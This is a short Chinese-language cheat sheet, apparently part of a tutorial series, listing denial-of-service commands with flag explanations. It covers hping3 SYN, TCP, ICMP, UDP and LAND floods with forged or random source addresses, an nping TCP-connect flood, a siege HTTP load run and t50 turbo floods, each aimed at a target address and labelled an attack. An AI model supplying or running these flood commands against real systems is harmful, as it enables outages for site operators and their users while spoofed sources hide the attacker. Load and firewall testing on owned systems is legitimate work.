DoS拒绝服务-工具使用hping三、nping等（四）

Hping3
几乎能够定制发送任何tcp/ip数据包，用于测试fw,端口扫描，性能测试

 1 Syn Flood
 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一条命令搞定
 3 -c 计数器，屡次数据包 -d 数据包多大 -S syn包 -p 目标攻击端口 --flood泛洪方式
 4 --rand-source：随机源地址 1.1.1.1 攻击的目标
 5 
 6 另一种组合：
 7 – hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
 8 
 9 TCP Flood攻击：
10 – hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 
11 -SARFUP标记类全标记满
12 
13 ICMP Flood攻击
14 – hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
15 -q:安静模式 -n:不做域名解析 -a:伪造源地址
16 
17 ▪ UDP Flood
18 – hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
19 -s:指定源端口，不指定也能够
20 
21 LAND攻击
22 – 伪造源地址和目标地址都是本身，形成本身打本身
23 – hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

 

---

 

nping
TCP全连接DoS攻击
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect：创建tcp链接 --rate=10000：速率一万个

---

 

Siege
– http/https 压力测试
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-c 1000个并发链接
-A 自定义http头,随便写均可以
– 同时攻击多个url,-f 使用字典
▪ /etc/siege/urls.txt

---

 

▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22